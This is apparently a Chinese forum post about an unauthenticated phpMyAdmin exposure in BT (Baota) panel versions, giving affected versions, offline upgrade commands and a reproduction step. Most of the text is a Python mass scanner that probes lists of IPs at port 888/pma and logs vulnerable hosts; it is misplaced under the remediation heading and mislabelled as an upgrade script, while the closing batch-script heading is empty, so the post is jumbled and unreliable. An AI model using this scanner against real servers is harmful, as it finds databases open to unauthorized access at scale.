登录后更精彩...O(∩_∩)O...
您需要 登录 才可以下载或查看,没有账号?立即注册
×
一、影响版本Liunx版本7.4.2版本和windows版6.8版本的用户务必更新到最新版(其他版本不受影响)
二、修复方案
或者使用升级脚本(注意:优先在面板首页直接点更新,失败的情况下,才使用此命令,且不能在面板自带的SSH终端执行):
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Author [url]www.ti0s.com[/url]
"""
import sys
import argparse
import requests
from multiprocessing import Pool, Manager
print("""
_____ _ ____ ______ ____ ____ __ __
|_ _|(_) / \ / ___/ / ___\ / \ | \ / |
| | _ | / \ | \___ \ | / | / \ || \/ |
| | | || \__/ | /___ > _ | \___ | \__/ || |\ /| |
|_| |_| \____/ \/ (_) \____/ \____/ |_| \/ | |(C)
""")
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
}
def btPam(ip):
url = "http://%s:888/pma/" % (ip)
try:
res = requests.get(url,headers=headers,timeout=5)
if res.status_code == 200:
print("%s Potentially Vulnerable"%(ip))
with open("result.txt","w") as wf:
wf.write(url)
finally:
return
def isbt(ip, q):
print('Testing {}'.format(ip))
btPam(ip)
q.put(ip)
def readip(flie):
ips = []
with open(flie,"r") as rf:
for i in rf.readlines():
ip = i.lstrip('https://').lstrip('http://').rstrip(':888').rstrip("/").strip()
ips.append(ip)
return ips
def pool(ips):
p = Pool(10)
q = Manager().Queue()
for i in ips:
p.apply_async(isbt, args=(i,q,))
p.close()
p.join()
print('请查看当前路径下文件:result.txt')
def run(filepath):
ips=readip(filepath)
pool(ips)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-l','--file',dest='file',type=str,help='批量扫描IP地址,示例:-l ip.txt ')
parser.add_argument('-i','--ip',dest='ip',type=str,help='单独扫描IP地址,示例:-i 192.168.0.1')
pa = parser.parse_args()
if len(sys.argv[1:]) == 0:
print("输入 -h 参数查看使用说明")
exit()
if pa.ip:
btPam(pa.ip)
if pa.file:
run(pa.file)
if __name__ == '__main__':
main()
离线升级步骤:
| 下载离线升级包:http://download.bt.cn/install/update/LinuxPanel-7.4.3.zip |
| 将升级包上传到服务器中的/root目录 |
| 解压文件:unzip LinuxPanel-7.4.3.zip |
| 切换到升级包目录:cd panel |
| 执行升级脚本:bash update.sh |
| 删除升级包:cd .. && rm -f LinuxPanel-7.4.3.zip && rm -rf panel |
三、复现过程访问IP:888/pma可直接登陆数据库
四、批量脚本
|